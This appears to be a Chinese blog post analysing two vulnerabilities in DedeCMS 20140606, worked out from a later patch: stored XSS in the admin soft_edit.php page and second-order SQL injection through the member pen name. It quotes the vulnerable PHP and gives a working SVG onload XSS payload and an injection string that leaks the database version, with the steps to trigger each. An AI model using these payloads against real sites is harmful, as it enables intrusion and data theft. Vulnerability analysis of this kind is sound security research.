dedecms20140606 二次注入+存储型xss

红色目录有exp,注入比较鸡肋
目录
dede/soft_edit.php, 存储型XSS漏洞        2
include /memberlogin.class.php 会员笔名二次注入        4

KibodWapon http://blog.163.com/cmdbat@126
从201406011补丁分析得来。

dede/soft_edit.php, 存储型XSS漏洞

[php]
<?php
/**
* 软件编辑
*
* @version        $Id: soft_edit.php 1 16:09 2010年7月20日Z tianya $
@package        DedeCMS.Administrator
* @copyright      Copyright (c) 2007 - 2010, DesDev, Inc.
* @license        http://help.dedecms.com/usersguide/license.html
* @link           http://www.dedecms.com
*/
require_once(dirname(__FILE__)."/config.php");
CheckPurview('a_Edit,a_AccEdit,a_MyEdit');
require_once(DEDEINC."/customfields.func.php");
require_once(DEDEADMIN."/inc/inc_archives_functions.php");
if(empty($dopost)) $dopost = '';

if($dopost!='save')
{
require_once(DEDEADMIN."/inc/inc_catalog_options.php");
require_once(DEDEINC."/dedetag.class.php");
ClearMyAddon();
$aid = preg_replace("#[^0-9]#", '', $aid);
$channelid="3";

//读取归档信息
$arcQuery = "SELECT
#@__channeltype.typename as channelname,
#@__arcrank.membername as rankname,
#@__archives.*
FROM #@__archives
LEFT JOIN #@__channeltype ON #@__channeltype.id=#@__archives.channel
LEFT JOIN #@__arcrank ON #@__arcrank.rank=#@__archives.arcrank
WHERE #@__archives.id='$aid'";
$dsql->SetQuery($arcQuery);
$arcRow = $dsql->GetOne($arcQuery);
if(!is_array($arcRow))
{
ShowMsg("读取档案基本信息出错!","-1");
exit();
}
$query = "SELECT * FROM `#@__channeltype` WHERE id='".$arcRow['channel']."'";
$cInfos = $dsql->GetOne($query);
if(!is_array($cInfos))
{
ShowMsg("读取频道配置信息出错!","javascript:;");
exit();
}
$addtable = $cInfos['addtable'];
$addQuery = "SELECT * FROM `$addtable` WHERE aid='$aid'";
$addRow = $dsql->GetOne($addQuery);
$newRowStart = 1;
$nForm = '';
$daccess = $addRow['daccess'];
$needmoney = $addRow['needmoney'];
if($addRow['softlinks'] != '')
{
$dtp = new DedeTagParse();
$dtp->LoadSource($addRow['softlinks']);
if(is_array($dtp->CTags))
{
foreach($dtp->CTags as $ctag)
{
if($ctag->GetName()=='link')
{
$islocal = $ctag->GetAtt('islocal');
if($islocal != 1) $needmsg = "<input type='checkbox' name='del{$newRowStart}' value='1' />删除";
else $needmsg = '<input name="sel1" type="button" id="sel1" value="选取" onClick="SelectSoft(\'form1.softurl'.$newRowStart.'\')" />';
$nForm .= "<div style='line-height:36px'>软件地址{$newRowStart}:<input type='text' name='softurl{$newRowStart}' style='width:280px' value='".trim($ctag->GetInnerText())."' />
服务器名称:<input type='text' name='servermsg{$newRowStart}' value='".$ctag->GetAtt("text")."' style='width:150px' />
<input type='hidden' name='islocal{$newRowStart}' value='{$islocal}' />
$needmsg
</div>\r\n";
$newRowStart++;
}
}
}
$dtp->Clear();
}
$channelid = $arcRow['channel'];
$tags = GetTags($aid);
$arcRow= $arcRow;$addRow= $addRow;
include DedeInclude("templets/soft_edit.htm");
exit();
}
[/php]

发布软件软件介绍处过滤不严
软件详情,点击源码编辑
[php]<svg / <g onload="javascript:alert(1)"></g></svg>[/php]1

include /memberlogin.class.php 会员笔名二次注入
注册用户笔名处注入
利用条件开启会员注册
[php]function FormatUsername($username)
{
$username = str_replace("`","‘",$username);
$username = str_replace("'","‘",$username);
$username = str_replace("\"","“",$username);
$username = str_replace(",",",",$username);
$username = str_replace("(","(",$username);
$username = str_replace(")",")",$username);
return addslashes($username);
}

$this->M_UserName = $this->fields['uname'];

[/php]

登陆函数
[php]function __construct($kptime = -1, $cache=FALSE)
{
global $dsql;
if($kptime==-1){
$this->M_KeepTime = 3600 * 24 * 7;
}else{
$this->M_KeepTime = $kptime;
}
$formcache = FALSE;
$this->M_ID = $this->GetNum(GetCookie("DedeUserID"));
$this->M_LoginTime = GetCookie("DedeLoginTime");
$this->fields = array();
$this->isAdmin = FALSE;
if(empty($this->M_ID))
{
$this->ResetUser();
}else{
$this->M_ID = intval($this->M_ID);

if ($cache)
{
$this->fields = GetCache($this->memberCache, $this->M_ID);
if( empty($this->fields) )
{
$this->fields = $dsql->GetOne("Select * From `#@__member` where mid='{$this->M_ID}' ");
} else {
$formcache = TRUE;
}
} else {
$this->fields = $dsql->GetOne("Select * From `#@__member` where mid='{$this->M_ID}' ");
}

if(is_array($this->fields)){
#api{{
if(defined('UC_API') && @include_once DEDEROOT.'/uc_client/client.php')
{
if($data = uc_get_user($this->fields['userid']))
{
if(uc_check_avatar($data[0]) && !strstr($this->fields['face'],UC_API))
{
$this->fields['face'] = UC_API.'/avatar.php?uid='.$data[0].'&size=middle';
$dsql->ExecuteNoneQuery("UPDATE `#@__member` SET `face`='".$this->fields['face']."' WHERE `mid`='{$this->M_ID}'");
}
}
}
#/aip}}

//间隔一小时更新一次用户登录时间
if(time() - $this->M_LoginTime > 3600)
{
$dsql->ExecuteNoneQuery("update `#@__member` set logintime='".time()."',loginip='".GetIP()."' where mid='".$this->fields['mid']."';");
PutCookie("DedeLoginTime",time(),$this->M_KeepTime);
}
$this->M_LoginID = $this->fields['userid'];
$this->M_MbType = $this->fields['mtype'];
$this->M_Money = $this->fields['money'];
$this->M_UserName = $this->fields['uname'];
$this->M_Scores = $this->fields['scores'];
$this->M_Face = $this->fields['face'];
$this->M_Rank = $this->fields['rank'];
$this->M_Spacesta = $this->fields['spacesta'];
$sql = "Select titles From #@__scores where integral<={$this->fields['scores']} order by integral desc";
$scrow = $dsql->GetOne($sql);
$this->fields['honor'] = $scrow['titles'];
$this->M_Honor = $this->fields['honor'];
if($this->fields['matt']==10) $this->isAdmin = TRUE;
$this->M_UpTime = $this->fields['uptime'];
$this->M_ExpTime = $this->fields['exptime'];
$this->M_JoinTime = MyDate('Y-m-d',$this->fields['jointime']);
if($this->M_Rank>10 && $this->M_UpTime>0){
$this->M_HasDay = $this->Judgemember();
}
if( !$formcache )
{
SetCache($this->memberCache, $this->M_ID, $this->fields, 1800);
}
}else{
$this->ResetUser();
}
}
}
[/php]
登陆后
[php]   /**
*  记录会员操作日志
*
* @access    public
* @param     string  $type 记录类型
* @param     string  $title 记录标题
* @param     string  $note记录描述
* @param     string  $aid涉及到的内容的id
* @return    string
*/
造成注入
会员动态表,
function RecordFeeds($type, $title, $note, $aid)
{
global $dsql,$cfg_mb_feedcheck;
//确定是否需要记录
if (in_array($type,array('add','addsoft','feedback','addfriends','stow'))){
$ntime = time();
$title = htmlspecialchars(cn_substrR($title,255));
if(in_array($type,array('add','addsoft','feedback','stow')))
{
$rcdtype = array('add'=>' 成功发布了', 'addsoft'=>' 成功发布了软件',
'feedback'=>' 评论了文章','stow'=>' 收藏了');
//内容发布处理
$arcrul = " <a href='/plus/view.php?aid=".$aid."'>".$title."</a>";
$title = htmlspecialchars($rcdtype[$type].$arcrul, ENT_QUOTES);
} else if ($type == 'addfriends')
{
//添加好友处理
$arcrul = " <a href='/member/index.php?uid=".$aid."'>".$aid."</a>";
$title = htmlspecialchars(' 与'. $arcrul."成为好友", ENT_QUOTES);
}
$note = Html2Text($note);
$aid = (isset($aid) && is_numeric($aid) ? $aid : 0);
$ischeck = ($cfg_mb_feedcheck == 'Y')? 0 : 1;
$query = "INSERT INTO `#@__member_feed` (`mid`, `userid`, `uname`, `type`, `aid`, `dtime`,`title`, `note`, `ischeck`)
Values('$this->M_ID', '$this->M_LoginID', '$this->M_UserName'/*二次注入到这里*/, '$type', '$aid', '$ntime', '$title', '$note', '$ischeck'); ";
$rs = $dsql->ExecuteNoneQuery($query);
return $rs;
} else {
return FALSE;
}
}

[/php]

用户笔名长度:
[php]if(strlen($userid) > 20 || strlen($uname) > 36)
{
ShowMsg('你的用户名或用户笔名过长,不允许注册!', '-1');
exit();
}

[/php]
注册用户笔名
exp:
',1,3,1,1,VERsion(),1),(1,1,'1

发表文章,任意
进入会员中心,点击我的动态

2

1 条评论

  1. 笑话

    无意间发现的网站 很不错 挺喜欢的

发表评论